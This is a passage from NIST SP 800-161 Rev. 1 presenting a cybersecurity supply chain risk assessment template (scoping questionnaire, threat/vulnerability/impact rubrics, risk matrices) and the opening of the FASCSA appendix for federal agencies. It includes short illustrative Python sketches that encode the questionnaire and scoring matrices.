Federal agencies should refer to Appendix E for additional guidance concerning supply chain
risk assessments.
4.1. C-SCRM Template
4.1.1. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern C-SCRA execution.
Sample Text
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology (SECURE Technology) Act of 2018
• Policies
o [Enterprise name] C-SCRA Standard Operating Procedures
o [Enterprise name] C-SCRA Risk Assessment Factors
o [Enterprise name] C-SCRA Criticality Assessment Criteria
• Guidelines
o NIST 800-53, Rev. 5: PM-30, RA-3, SA-15, SR-5
o NIST 800-37, Rev. 2
o NIST 800-161, Rev. 1: Appendix C
o ISO 28001:2007
43 For the purposes of this document, the expression “cybersecurity supply chain risk assessment” should be considered equivalent to “supply
chain risk assessment” in an effort to harmonize terminology.
44 A supplier may also refer to a source, as defined in the Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology (SECURE Technology) Act of 2018.
4.1.2. Description
Describe the purpose and scope of the C-SCRA template, and reference the enterprise
commitment to C-SCRM and mandate to perform C-SCRAs as an extension of that commitment.
Outline the template’s relationship to enterprise risk management principles, frameworks, and
practices. This may include providing an overview of the enterprise’s C-SCRA processes,
standard operating procedures, and/or criticality designations that govern the usage of this
template.
Reinforce the business case for executing C-SCRA by highlighting the benefits of reducing
expected loss from adverse supply chain cybersecurity events, as well as the C-SCRM PMO’s
role in efficiently executing these assessments at scale.
Provide an overview of the enterprise’s boundaries, systems, and services within the scope of the
C-SCRAs.
List the contact information and other resources that readers may access in order to further
engage with the C-SCRA process.
Sample Text
This C-SCRA is intended to fairly and consistently evaluate risks posed to the [enterprise] via
third parties that hold the potential for harm or compromise as a result of cybersecurity risks.
Cybersecurity risks in the supply chain include exposures, threats, and vulnerabilities associated
with the products and services traversing the supply chain, as well as the exposures, threats, and
vulnerabilities to the supply chain and its suppliers.
The C-SCRA template provides tactical guidelines for the C-SCRM PMO to review
cybersecurity risk in the supply chain and ensure that C-SCRAs are appropriately, efficiently,
and effectively carried out in line with enterprise mandates.
Requestors seeking to introduce third-party products, services, or suppliers into enterprise
boundaries should familiarize themselves with the following template. This will ensure that
requestors can provide the requisite information to the C-SCRM PMO to ensure timely execution
of C-SCRAs and are otherwise aligned with adherence to the steps of the C-SCRA.
The C-SCRA process contains five primary steps, as outlined in the below template:45
1. Information Gathering and Scoping Analysis
2. Threat Analysis
3. Vulnerability Analysis
4. Impact Analysis
5. Risk Response Analysis
45 See Appendix D’s “Assess” section for the methodological principles and guidance that underpin these steps.
To learn more about the C-SCRA process and/or submit an assessment request to the C-SCRM
PMO, please go to [enterprise’s intranet page] or contact [C-SCRM PMO email].
4.1.3. Information Gathering and Scoping Analysis
Define the purpose and objectives for the requested C-SCRA, and outline the key information
required to appropriately define the system, operations, supporting architecture, and
boundaries. Provide key questions to requestors to facilitate the collection and analysis of this
information. The C-SCRM PMO will then use this information as a baseline for subsequent
analyses and data requests.
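Because C-SCRAs must be executed at scale with templated workflows and automation wherever possible, an enterprise may choose to encode the scoping questionnaire below as structured data. The following is a minimal sketch (in Python; the class and field names are illustrative assumptions, not part of this publication):

```python
from dataclasses import dataclass, field

# Hypothetical encoding of one scoping-questionnaire item; the names are
# illustrative and not prescribed by NIST SP 800-161r1.
@dataclass
class ScopingQuestion:
    section: str        # e.g., "Request Overview"
    question: str       # question text from the template
    respondent: str     # "Acquirer", "Supplier", or "Manufacturer"
    response: str = ""  # populated during the assessment

@dataclass
class ScopingQuestionnaire:
    system_name: str
    items: list[ScopingQuestion] = field(default_factory=list)

    def unanswered(self) -> list[ScopingQuestion]:
        """Return items still awaiting a response, for follow-up requests."""
        return [q for q in self.items if not q.response]

# Example usage
q = ScopingQuestionnaire(system_name="[system name]")
q.items.append(ScopingQuestion(
    section="Product/Service Internal Risk Overview",
    question="Does the product/service perform an essential security function?",
    respondent="Acquirer"))
print(len(q.unanswered()))  # -> 1
```

A structure like this lets the C-SCRM PMO track which respondents (acquirer, supplier, or manufacturer) still owe answers before the threat, vulnerability, and impact analyses begin.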
Sample Text
Table D-13: Information Gathering and Scoping Analysis
Supply Chain Risk Management Assessment Scoping Questionnaire

| Question | Provide Response: | Response Provided by: |
|---|---|---|
| Section 1: Request Overview | | |
| Requestor Name | | Acquirer |
| C-SCRA Purpose and Objective | | Acquirer |
| System Description | | Acquirer |
| Architecture Overview | | Acquirer |
| Boundary Definition | | Acquirer |
| Date of Assessment | | Acquirer |
| Assessor Name | | Acquirer |
| Section 2: Product/Service Internal Risk Overview | | |
| What % of this supplier’s sales of this product/service does your enterprise consume? | | Acquirer or Supplier |
| How widely used is or will the product or service be in your enterprise? | | Acquirer |
| Is the product/service manufactured in a geographic location that is considered an area of geopolitical risk for your enterprise based on its primary area of operation (e.g., in the United States)? | | Acquirer or Supplier |
| Is the product manufactured or developed in a country identified as a foreign adversary or country of special concern? | | Acquirer |
| Would switching to an alternative supplier for this product or service constitute significant cost or effort for your enterprise? | | Acquirer |
| Does your enterprise have an existing relationship with another supplier for this product/service? | | Acquirer |
| How confident is your enterprise that it will be able to obtain quality products/services regardless of major supply chain disruptions, both human and natural? | | Acquirer |
| Does your enterprise maintain a reserve of this product/service? | | Acquirer |
| Is the product/service fit for purpose (i.e., capable of meeting objectives or service levels)? | | Acquirer |
| Does the product/service perform an essential security function? If so, please describe. | | Acquirer |
| Does the product/service have root access to IT networks, OT systems, or sensitive platforms? | | Acquirer |
| Can compromise of the product/service lead to system failure or severe degradation? | | Acquirer |
| In the event of compromise leading to system failure or severe degradation, is there a known independent reliable mitigation? | | Acquirer |
| Will/does the product/service connect to a platform that is provided to customers by your enterprise? | | Acquirer |
| Will/does the product/service transmit, generate, maintain, or process high value data (e.g., PII, PHI, PCI)? | | Acquirer |
| Will/does the product/service have access to systems that transmit, generate, maintain, or process high value data (e.g., PII, PHI, PCI)? | | Acquirer |
| Will/does the supplier require physical access to the company’s facilities as a result of its provision of the product/service? | | Acquirer |
| Based on holistic consideration of the above responses, how critical is this product/service to your enterprise (i.e., critical, high, moderate, low)? | | Acquirer |
| Section 3: Supplier Overview | | |
| Have you identified the supplier’s critical suppliers? | | Supplier |
| Did you verify the supplier ownership, whether foreign and domestic? | | Supplier |
| If the supplier uses distributors, did you investigate them for potential risks? | | Supplier |
| Is the supplier located in the United States? | | Supplier |
| Does the supplier have personnel and/or professional ties (including its officers, directors, or similar officials, employees, consultants, or contractors) with any foreign government? | | Supplier |
| Is there foreign ownership, control, or influence (FOCI) over the supplier or any business entities involved in the supply chain? If so, is the FOCI from a foreign adversary of the United States or country of concern? | | Supplier |
| Do the laws and regulations of any foreign country in which the supplier has headquarters, research, development, manufacturing, testing, packaging, distribution, or service facilities or other operations require the sharing of technology or data with that foreign country? | | Supplier |
| Has the supplier declared where replacement components will be purchased from? | | Supplier |
| Have the owners and locations of all of the suppliers, subcontractors, and sub-tier suppliers been identified and validated? | | Supplier |
| Does the supplier employ the use of threat scenarios to inform the vetting of sub-tier suppliers? | | Supplier |
| Does the supplier have documents that track part numbers to manufacturers? | | Supplier |
| Can the supplier provide a list of who they procure hardware and software from that is utilized in the performance of the contract? | | Supplier |
| Does the supplier have counterfeit controls in place? | | Supplier |
| Does the supplier safeguard key program information that may be exposed through interactions with other suppliers? | | Supplier |
| Does the supplier perform reviews and inspections and have safeguards to detect or avoid counterfeit equipment, tampered hardware or software (HW/SW), vulnerable HW/SW, and/or operations security leaks? | | Supplier |
| Does the supplier use industry standard baselines (e.g., CIS, NES) when purchasing software? | | Supplier |
| Does the supplier comply with regulatory and legislative mandates? | | Supplier |
| Does the supplier have procedures for secure maintenance and upgrades following deployment? | | Supplier |
| Section 4: Policies and Procedures | | |
| Does the supplier have definitive policies and procedures that help minimize supply chain risk, including subsidiary sourcing needs? | | Supplier |
| Does the supplier define and manage system criticality and capabilities? | | Supplier |
| Does everyone associated with the procurement (e.g., supplier, C-SCRM PMO) understand the potential threats to and risks in the subject supply chain? | | Supplier |
| What is the citizenship of all engaged personnel? If required, are all engaged personnel US citizens? | | Supplier |
| Does the supplier have “insider threat” controls in place? | | Supplier |
| Does the supplier verify and monitor all personnel who interact with the subject product, system, or service to know if they pose a threat? | | Supplier |
| Does the supplier use, record, and track risk mitigation activities throughout the life cycle of the product, system, or service? | | Supplier |
| Have all of the supplier’s personnel signed non-disclosure agreements? | | Supplier |
| Does the supplier allow its personnel or suppliers to remotely access environments? | | Supplier |
| Section 5: Logistics (if applicable) | | |
| Does the supplier have documented tracking and version controls in place? | | Supplier |
| Does the supplier analyze events (environmental or human-made) that could interrupt their supply chain? | | Supplier |
| Are the supplier’s completed parts controlled so that they are never left unattended or exposed to tampering? | | Supplier |
| Are the supplier’s completed parts locked up? | | Supplier |
| Does the supplier have a process that ensures integrity when ordering inventory from their supplier? | | Supplier |
| Is the supplier’s inventory periodically inspected for exposure or tampering? | | Supplier |
| Does the supplier have secure material destruction procedures for unused and scrap parts procured from their supplier? | | Supplier |
| Is there a documented chain of custody for the deployment of products and systems? | | Supplier |
| Section 6: Software Design and Development (if applicable) | | |
| Is the supplier familiar with all of their suppliers that will work on the design of the product/system? | | Supplier and Manufacturer |
| Does the supplier align its SDLC to a secure software development standard (e.g., Microsoft Security Development Life Cycle)? | | Supplier and Manufacturer |
| Does the supplier perform all development onshore? | | Supplier and Manufacturer |
| Do only United States citizens have access to development environments? | | Supplier and Manufacturer |
| Does the supplier provide cybersecurity training to its developers? | | Supplier and Manufacturer |
| Does the supplier use trusted software development tools? | | Supplier and Manufacturer |
| Is the supplier using trusted information assurance controls to safeguard the development environment (e.g., secure network configurations, strict access controls, dynamic/static vulnerability management tools, penetration testing)? | | Supplier and Manufacturer |
| Does the supplier validate open source software prior to use? | | Supplier and Manufacturer |
| Are the supplier’s software compilers continuously monitored? | | Supplier and Manufacturer |
| Does the supplier have codified software test and configuration standards? | | Supplier and Manufacturer |
| Section 7: Product- or Service-specific Security (if applicable, one questionnaire per product/service) | | |
| Name of Product or Service | | Manufacturer |
| Product Type (i.e., hardware, software, service) | | Manufacturer |
| Description of Product or Service | | Manufacturer |
| Part Number (if applicable) | | Manufacturer |
| Does the manufacturer implement formal enterprise roles and governance responsible for the implementation and oversight of secure engineering across the development or manufacturing process for product offerings? | | Manufacturer |
| Does the manufacturer have processes for product integrity that conform to standards such as ISO 27036 or SAE AS6171? | | Manufacturer |
| Is the product compliant with Federal Information Processing Standards (FIPS) 140-2? If yes, please provide the FIPS level. | | Manufacturer |
| Does the manufacturer document and communicate security control requirements for your hardware, software, or solution offering? | | Manufacturer |
| Has the manufacturer received fines or sanctions from any governmental entity or regulatory body in the past year related to delivery of the product or service? If yes, please describe. | | Manufacturer |
| Has the manufacturer experienced litigation claims over the past year related to the delivery of the product or service? If yes, please describe. | | Manufacturer |
| Does the manufacturer provide a bill of materials (BOM) for the products, service, or components, including all logic-bearing (e.g., readable, writable, programmable) hardware, firmware, and software? | | Manufacturer |
| For hardware components included in the product or service offering, does the supplier only buy from original equipment manufacturers or licensed resellers? | | Supplier |
| Does the manufacturer have a policy or process to ensure that none of your suppliers or third-party components are on any banned list? | | Manufacturer |
| How does the manufacturer prevent malicious and/or counterfeit IP components in their product offerings or solutions? | | Manufacturer |
| Does the manufacturer manage the integrity of IP for its products or service offerings? | | Manufacturer |
| How does the manufacturer assess, prioritize, and remediate reported product or service vulnerabilities? | | Manufacturer |
| How does the manufacturer ensure that product or service vulnerabilities are remediated in a timely period to reduce the window of opportunity for attackers? | | Manufacturer |
| Does the manufacturer maintain and manage a Product Security Incident Reporting and Response program (PSRT)? | | Manufacturer |
| What is the manufacturer’s process for ensuring that customers and external entities (such as government agencies) are notified of an incident when their product or service is impacted? | | Manufacturer |
4.1.4. Threat Analysis
Define threat analysis as well as the criteria that will be utilized to assess the threat of the
product, service, or supplier. Include a rubric with categorical definitions to encourage the
transparency of assessment results.
Sample Text
The C-SCRA threat analysis evaluates and characterizes the level of threat to the integrity,
trustworthiness, and authenticity of the product, service, or supplier as described below.
This analysis is based on a threat actor’s capability and intent to compromise or exploit the
product, service, or supplier being introduced into the supply chain. Following completion of the
analysis, one of the following threat levels is assigned:
• Critical: Information indicates that an adversarial or non-adversarial threat is imminent
(e.g., an adversary is actively engaged in subversion, exploitation, or sabotage of the
product, service, or supplier).
• High: Information indicates that an adversarial or non-adversarial threat is likely
(e.g., significant drought in the geographical area combined with location characteristics
of the asset yields high potential for forest fires).
• Moderate: Information indicates that an adversarial or non-adversarial threat has an
average potential to impact or target the enterprise (e.g., a specific adversarial threat
exists but lacks either the capability or the intent to engage in subversion, exploitation or
sabotage of the product, service, or supplier).
• Low: Information indicates that adversarial or non-adversarial threats are non-existent,
unlikely, or have below average potential to impact or target the enterprise (e.g.,
adversarial threats lack both the capability and the intent to engage in subversion,
exploitation, or sabotage of the product, service, or supplier).
To appropriately assign the above threat analysis designation, C-SCRM PMOs and requestors
should leverage the Information Gathering and Scoping questionnaire to coordinate the
collection of information related to the product, service, or supplier’s operational details,
ownership structure, key management personnel, financial information, business ventures,
government restrictions, and potential threats. Additional investigations of the aforementioned
topics should be performed if red flags are observed during initial data collection.
4.1.5. Vulnerability Analysis
Define vulnerability analysis and the criteria that will be utilized to assess the vulnerability of
the product, service, or supplier being assessed. Include a rubric with categorical definitions to
encourage transparency behind assessment results.
Sample Text
The C-SCRA vulnerability analysis evaluates and then characterizes the vulnerability of the
product, service, or supplier throughout its life cycle and/or engagement. The analysis includes
an assessment of the ease of exploitation by a threat actor with moderate capabilities. This
analysis is based on a threat actor’s capability and intent to compromise or exploit the product,
service, or supplier being introduced into the supply chain. Following completion of the analysis,
one of the following vulnerability levels is assigned:
• Critical: The product, service, or supplier contains vulnerabilities or weaknesses that are
wholly exposed and easily exploitable.
• High: The product, service, or supplier contains vulnerabilities or weaknesses that are
highly exposed and reasonably exploitable.
• Moderate: The product, service, or supplier contains vulnerabilities or weaknesses that
are moderately exposed and difficult to exploit.
• Low: The product, service, or supplier contains vulnerabilities or weaknesses that have
limited exposure and are unlikely to be exploited.
To appropriately assign the above vulnerability analysis designation, C-SCRM PMOs and
requestors should coordinate the collection of information related to the product, service, or
supplier’s operational details, exploitability, service details, attributes of known vulnerabilities,
and mitigation techniques.
4.1.6. Impact Analysis
Define impact analysis and the criteria that will be utilized to assess the criticality of the
product, service, or supplier being assessed. Include a rubric with categorical definitions to
encourage the transparency of assessment results.
Sample Text
The C-SCRA impact analysis evaluates and then characterizes the impact of the product, service,
or supplier throughout its life cycle and/or engagement. The analysis includes an end-to-end
functional review to identify critical functions and components based on an assessment of the
potential harm caused by the probable loss, damage, or compromise of a product, material, or
service to an enterprise’s operations or mission. Upon completion of the analysis, one of the
following impact levels is assigned:
• Critical: The product, service, or supplier’s failure to perform as designed would result
in a total enterprise failure or a significant and/or unacceptable level of degradation of
operations that could only be recovered with exceptional time and resources.
• High: The product, service, or supplier’s failure to perform as designed would result in
severe enterprise failure or a significant and/or unacceptable level of degradation of
operations that could only be recovered with significant time and resources.
• Moderate: The product, service, or supplier’s failure to perform as designed would result
in serious enterprise failure that could be readily and quickly managed with no long-term
consequences.
• Low: The product, service, or supplier’s failure to perform as designed would result in
few adverse effects on the enterprise, and those effects could be readily and quickly
managed with no long-term consequences.
To appropriately assign the above impact analysis designation, C-SCRM PMOs and requestors
should coordinate the collection of information related to the enterprise’s critical functions and
components, the identification of the intended user environment for the product or service, and
supplier information.
4.1.7. Risk Response Analysis
Define risk response analysis and the criteria that will be utilized to score the product or
service being assessed. Include a rubric with categorical definitions to encourage the
transparency of assessment results.
Sample Text
The C-SCRA risk exposure reflects a combined judgment based on the likelihood and impact
analyses. The likelihood is scored via a combination of the aforementioned threat and
vulnerability analysis scores, as outlined in the figure below.
Likelihood Level

| Threat \ Vulnerability | Low | Moderate | High | Critical |
|---|---|---|---|---|
| Critical | Moderately Likely | Highly Likely | Very Likely | Very Likely |
| High | Moderately Likely | Highly Likely | Highly Likely | Very Likely |
| Moderate | Unlikely | Moderately Likely | Highly Likely | Highly Likely |
| Low | Unlikely | Unlikely | Moderately Likely | Moderately Likely |
Fig. D-2: Example Likelihood Determination
The C-SCRA risk exposure is then aggregated based on that likelihood score and the impact
score. If multiple vulnerabilities are identified for a given product or service, each vulnerability
shall be assigned a risk level based on its likelihood and impact.
Overall Risk Exposure

| Likelihood (threat and vulnerability) \ Impact | Low | Moderate | High | Critical |
|---|---|---|---|---|
| Very Likely | Moderate | High | Critical | Critical |
| Highly Likely | Moderate | Moderate | High | Critical |
| Moderately Likely | Low | Moderate | High | High |
| Unlikely | Low | Low | Moderate | High |
Fig. D-3: Example Risk Exposure Determination
The aforementioned risk analyses and scoring provide measures by which the enterprise
determines whether or not to proceed with procurement of the product, service, or supplier.
Decisions to proceed must be weighed against the risk appetite and tolerance across the tiers of
the enterprise, as well as the mitigation strategy that may be put in place to manage the risks as a
result of procuring the product, service, or supplier.
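For enterprises that automate scoring, the two example matrices above reduce to simple lookups. The sketch below (in Python; an illustrative encoding of the example matrices, not a prescribed implementation) captures Fig. D-2 and Fig. D-3 directly:

```python
# Minimal sketch of the example likelihood and risk exposure determinations
# shown in Fig. D-2 and Fig. D-3; the dictionary keys mirror the rubric labels.
LIKELIHOOD = {  # (threat, vulnerability) -> likelihood
    ("Critical", "Low"): "Moderately Likely",
    ("Critical", "Moderate"): "Highly Likely",
    ("Critical", "High"): "Very Likely",
    ("Critical", "Critical"): "Very Likely",
    ("High", "Low"): "Moderately Likely",
    ("High", "Moderate"): "Highly Likely",
    ("High", "High"): "Highly Likely",
    ("High", "Critical"): "Very Likely",
    ("Moderate", "Low"): "Unlikely",
    ("Moderate", "Moderate"): "Moderately Likely",
    ("Moderate", "High"): "Highly Likely",
    ("Moderate", "Critical"): "Highly Likely",
    ("Low", "Low"): "Unlikely",
    ("Low", "Moderate"): "Unlikely",
    ("Low", "High"): "Moderately Likely",
    ("Low", "Critical"): "Moderately Likely",
}

RISK_EXPOSURE = {  # (likelihood, impact) -> overall risk exposure
    ("Very Likely", "Low"): "Moderate",
    ("Very Likely", "Moderate"): "High",
    ("Very Likely", "High"): "Critical",
    ("Very Likely", "Critical"): "Critical",
    ("Highly Likely", "Low"): "Moderate",
    ("Highly Likely", "Moderate"): "Moderate",
    ("Highly Likely", "High"): "High",
    ("Highly Likely", "Critical"): "Critical",
    ("Moderately Likely", "Low"): "Low",
    ("Moderately Likely", "Moderate"): "Moderate",
    ("Moderately Likely", "High"): "High",
    ("Moderately Likely", "Critical"): "High",
    ("Unlikely", "Low"): "Low",
    ("Unlikely", "Moderate"): "Low",
    ("Unlikely", "High"): "Moderate",
    ("Unlikely", "Critical"): "High",
}

def risk_exposure(threat: str, vulnerability: str, impact: str) -> str:
    """Combine threat, vulnerability, and impact levels per the example matrices."""
    likelihood = LIKELIHOOD[(threat, vulnerability)]
    return RISK_EXPOSURE[(likelihood, impact)]

print(risk_exposure("High", "Moderate", "Critical"))  # -> "Critical"
```

Encoding the matrices as data rather than logic keeps the rubric auditable and easy to tailor to an enterprise’s own risk appetite and tolerance.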
4.1.8. Roles and Responsibilities
State those responsible for the C-SCRA policies, as well as key contributors. Include the role
and name of each individual or group, as well as contact information where necessary (e.g.,
enterprise affiliation, address, email address, and phone number).
Sample Text
• The C-SCRM PMO shall:
o Maintain C-SCRA policies, procedures, and scoring methodologies;
o Perform C-SCRA standard operating procedures;
o Liaise with requestors seeking to procure a product, service, or supplier; and
o Report C-SCRA results to leadership to help inform enterprise risk posture.
• Each requestor shall:
o Complete C-SCRA request forms and provide all required information,
o Address any information follow-up requests from the C-SCRM PMO resource
completing the C-SCRA, and
o Adhere to any stipulations or mitigations mandated by the C-SCRM PMO
following approval of a C-SCRA request.
4.1.9. Definitions
List the key definitions described within the policy, and provide enterprise-specific context and
examples where needed.
Sample Text
• Procurement: The process of obtaining a system, product, or service.
4.1.10. Revision and Maintenance
Define the required frequency for updating the C-SCRA template. Maintain a table of revisions
to enforce version control. C-SCRA templates are living documents that must be updated and
communicated to all appropriate individuals (e.g., staff, contractors, and suppliers).
Sample Text
The enterprise’s C-SCRA template must be reviewed on an annual basis, at a minimum, since
changes to laws, policies, standards, guidelines, and controls are dynamic and evolving.
Additional criteria that may trigger interim revisions include:
• A change of policies that impact the C-SCRA template,
• Significant C-SCRM events,
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
• Shortcomings in the C-SCRA template,
• A change of scope, and
• Other enterprise-specific criteria.
Sample Text
Table D-14: Version Management Table
| Version Number | Date | Description of Change/Revision | Section/Pages Affected | Changes Made by (Name/Title/Enterprise) |
|---|---|---|---|---|
| | | | | |
APPENDIX E: FASCSA46
INTRODUCTION
Purpose, Audience, and Background
This Appendix augments the content in NIST SP 800-161, Rev. 1 and provides additional
guidance specific to federal executive agencies related to supply chain risk assessment factors,
assessment documentation, risk severity levels, and risk response.
As discussed in the introductory section of the main body of SP 800-161, Rev. 1, the Federal
Acquisition Supply Chain Security Act of 2018 (FASCSA), Title II of the SECURE Technology
Act (P.L. 115-390), was enacted to improve executive branch coordination, supply chain risk
information (SCRI) sharing, and actions to address supply chain risks. The law established the
Federal Acquisition Security Council (FASC),47 an interagency executive body at the federal
enterprise level. This council is authorized to perform a range of functions intended to reduce the
Federal Government’s supply chain risk exposure and risk impact.
The FASCSA provides the FASC and executive agencies with authorities relating to mitigating
supply chain risks, to include the exclusion and/or removal of sources and covered articles.48 The
law also mandates that agencies conduct and prioritize supply chain risk assessments (SCRAs).
The guidance in this appendix is specific to this FASCSA requirement, as described below, and
addresses the need for a baseline level of consistency and alignment between agency-level C-
SCRM risk assessment and response functions and those SCRM functions that occur at the
government-wide level by authorized bodies such as the FASC.
Scope
IN SCOPE
This appendix is primarily focused on providing agencies with additional guidance concerning
Section 1326 (a) (1) of the FASCSA,49 which requires executive agencies to assess the supply
chain risk posed by the acquisition and use of covered articles and to respond to that risk as
appropriate. The law directs agencies to perform this activity and other SCRM activities
described therein, consistent with NIST standards, guidelines, and practices.
OUT OF SCOPE
Section 4713 of the FASCSA50 pertains to executive agencies’ authority to carry out covered
procurement actions. Specific guidance concerning those actions is outside of the scope of this
46 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
47 For additional information about the FASC authorities, membership, functions, and processes, readers should refer to the Federal Acquisition
Security Council Final Rule, 41 CFR Parts 201 and 201-1. See: https://www.govinfo.gov/content/pkg/FR-2021-08-26/pdf/2021-17532.pdf.
48 As defined by FASCSA, a covered article means: Information technology, including cloud computing services of all types; telecommunications
equipment or telecommunications services; the processing of information on a federal or non-federal information system, subject to the
requirements of the Controlled Unclassified Information program; all IoT/OT (e.g., hardware, systems, devices, software, or services that include
embedded or incidental information technology).
49 See 41 USC 1326 (a) (1)
50 41 USC 4713
appendix. The FASCSA requires the Federal Acquisition Regulatory (FAR) Council to prescribe
such regulations as may be necessary to carry out this section. NIST does and will continue to
work closely with interagency colleagues within the FASC and the federal acquisition
community to help ensure harmonized guidance.
This appendix does not provide guidance on how to conduct an assessment, which is best
addressed through role-based training, education, and work experience. NIST SP 800-30, Rev. 1,
Guide for Conducting Risk Assessments, is also a recommended reference. Agencies should take
steps to ensure that personnel with current and prospective responsibilities for performing
SCRAs have adequate skills, knowledge, and depth and breadth of experience sufficient to
identify and discern indications of cybersecurity risk in the supply chain and the assessment of
those risks. Agencies are strongly encouraged to invest in training to grow and sustain
competencies in analytic skills and SCRM knowledge. Counter-intelligence and security training
are also strongly recommended for C-SCRM PMO staff or those personnel with responsibilities
dedicated to performing SCRAs. Building this capability helps to ensure that there is sufficient
understanding and awareness of adversarial-related supply chain risks in the workforce while
also developing a risk management cadre to provide advice and support for risk response
decisions and actions.
Relationship to NIST SP 800-161, Rev. 1, Cybersecurity Supply Chain Risk Management
Practices for Systems and Organizations
The practices and processes to assess, respond to, and otherwise manage cybersecurity risks in
the supply chain are discussed at length throughout the main body and appendices of NIST SP
800-161, Rev. 1. This appendix provides supplemental expanded guidance that is tailored and
applicable to federal agencies. This guidance describes the scope and type of supply chain risk
assessment information and documentation used to support and advise risk response decisions
and actions, both internally to senior agency officials and externally to bodies such as the FASC.
This augmented guidance is also intended to ensure a baseline consistency and sufficiency of
processes and SCRI utilized for assessment and documentation and to facilitate information
sharing and recommendations to applicable decision makers, whether at a given agency or at the
government-wide level. Within the constraints of requisite support for federal enterprise-level
analysis and decision-making, agencies continue to have the flexibility to assess and manage
their supply chain risk in a manner consistent with the broader guidance outlined in the main
body and other appendices of NIST SP 800-161, Rev. 1 and with their policies, mission and
priority needs, and existing practices (to the extent that these are sufficient).
FASCSA Supply Chain Risk Definition vs. NIST SP 800-161, Rev. 1, Cybersecurity-Supply
Chain Risk Definition
Agencies should take note that the FASCSA definition of supply chain risk is narrowly focused
on risk that arises from an assessment that there is intent and capability by an adversarial threat
actor to conduct malicious activity or otherwise cause malicious harm. In contrast, NIST’s
definition and scope of cybersecurity supply chain risk is otherwise consistent with the FASCSA
definition but broader in scope as it includes both adversarial and non-adversarial-related risks.
Consistent with the FASCSA’s direction that agencies rely upon NIST standards and guidance,
agencies need to ensure that their assessment and risk response activities address all applicable
cybersecurity risks throughout the supply chain.
SUPPLY CHAIN RISK ASSESSMENTS (SCRAs)
General Information
The FASCSA requires agencies to conduct and prioritize supply chain risk assessments when
acquiring a covered article as well as during its use or performance. In most cases, this also
compels the need to assess the source associated with the covered article. Supply chain risk
assessments conducted by agencies are highly dependent on the operating environment and use
case associated with a covered article. Agencies have flexibility in how they apply NIST
guidelines to their operations, and there is not (nor should there be) a one-size-fits-all approach
to conducting a SCRA. However, to facilitate assessments that may need to take place at the
government-wide level to evaluate risks that may impact national security or multiple agency
missions, there is a need to ensure that agencies’ SCRA information and documentation reflect
an acceptable baseline level of due diligence and standardization.
In general, information used for an assessment will be comprised of up to three categories of
inputs:
1) Purpose and context information (i.e., use-case specific) used to understand the risk
environment and to inform and establish risk tolerance relative to the use case
2) Data or information obtained from the source
3) All-source information, which may come from publicly available data, government sources
(may include classified sources), and/or commercial fee-based sources
The purpose and context, as well as the point in the SDLC or procurement life cycle at which a
supplier and/or covered article is assessed, will drive variations in the focus and scope of an
assessment: what type of information is obtained, how much, and from what sources.
The FASCSA recognizes that agencies have constrained resources, but it is necessary to
prioritize the conduct of SCRAs.51 Prioritization does not mean that only a subset of sources or
covered articles should be assessed. Rather, agencies should establish a tiered
51 See Section 1326 (a)(2) of the FASCSA.
set of priority levels commensurate with the criticality and potential for risk impact. This tiering
can then be used to guide or compel the timing, order, scope, and frequency of SCRAs.
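As one illustration of such tiering, an agency might map criticality and credible risk findings to priority tiers that drive reassessment frequency and scope. The sketch below is a hypothetical example in Python; the tier names, frequencies, and scopes are assumptions for illustration, not requirements of the FASCSA or of this publication.

```python
# Illustrative tiered SCRA prioritization scheme; all tier names, frequencies,
# and scopes are hypothetical examples, not prescribed by NIST SP 800-161r1.
PRIORITY_TIERS = {
    # tier: (reassessment frequency, assessment scope)
    "Tier 1 - critical source/covered article": ("annually", "all baseline risk factors, full depth"),
    "Tier 2 - elevated concern": ("every 2 years", "all baseline risk factors"),
    "Tier 3 - non-critical": ("event-driven", "agency-selected subset of baseline factors"),
}

def assign_tier(is_critical: bool, credible_findings: bool) -> str:
    """Map criticality and credible risk findings to a priority tier."""
    if is_critical:
        return "Tier 1 - critical source/covered article"
    if credible_findings:
        return "Tier 2 - elevated concern"
    return "Tier 3 - non-critical"

print(assign_tier(is_critical=False, credible_findings=True))  # -> Tier 2
```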
In addition to externally driven priorities (e.g., government-wide policy direction, regulatory
requirement, etc.) and agency-defined prioritization factors, NIST SP 800-161, Rev. 1 instructs
agencies to prioritize assessments concerning critical suppliers (i.e., sources) and critical systems
and services, as compromise of these sources and covered articles is likely to result in greater
harm than something determined to be non-critical. For these assessments, agencies should
address all baseline risk factors described in the Baseline Risk Factors (common, minimal)
section below (augmenting and weighing the factors, as appropriate to the use case, to ensure
appropriate consideration of both adversarial and non-adversarial-related risks). For a given non-
critical source or non-critical covered article, agencies have discretion (consistent with their
own internal policies and practices and absent other mandates) as to whether all or some of the
baseline risk factors described in this appendix, and to what extent, should be considered when
assessing supply chain risk. However, if and when there are one or more credible findings that
indicate that a substantial supply chain risk may or does exist (see Supply Chain Risk Severity
Schema, described below), it may require that a more comprehensive assessment be completed,
inclusive of all of the baseline risk factors or more robust research and analysis of the baseline
risk factors. (See the risk response guidance described in the Risk Response Section below.)
The responsibility and accountability for determining the priority levels for SCRAs, evaluating
impact, making risk response decisions, and taking actions based on the findings in a SCRA are
inherently governmental functions and cannot be outsourced. However, some agencies may rely
on a qualified third party for support in conducting research, documenting findings, and
reviewing relevant information. To aid in their research and assessment activities, agencies may
also acquire access to commercially available data or tools. Appropriate requirements should be
included in solicitations and contracts to address access to, handling of, and safeguarding of SCRI.
Failure to do this, in and of itself, reflects a security control gap and creates an unmitigated
supply chain risk. Moreover, such a gap can undermine the entire purpose of an agency’s SCRA
efforts or even facilitate the success of foreign adversaries’ malicious actions against the United
States. Additionally, agency personnel should follow the guidance and direction of their ethics
officials and legal counsel to ensure that protections are in place to guard against conflicts of
interest and inappropriate or unauthorized access to or disclosure of information, as SCRI may
be sensitive, proprietary, or – in certain instances – classified. For the latter category of
information, agencies must ensure adherence to laws, policies, and procedures governing
classified information and limit access to only those personnel who have the proper clearance,
authorized access, and need to know.
In all instances, personnel who support the conduct of an assessment have a duty and
responsibility to act prudently and objectively and to exercise reasonable care in researching and
analyzing a source or covered article as this SCRI underpins subsequent risk response decisions
and actions.
Baseline Risk Factors (Common, Minimal)
This section describes the baseline (common, non-exclusive) supply chain risk factors and
guidance that agencies should incorporate into (or map to the factors included in) their agency-
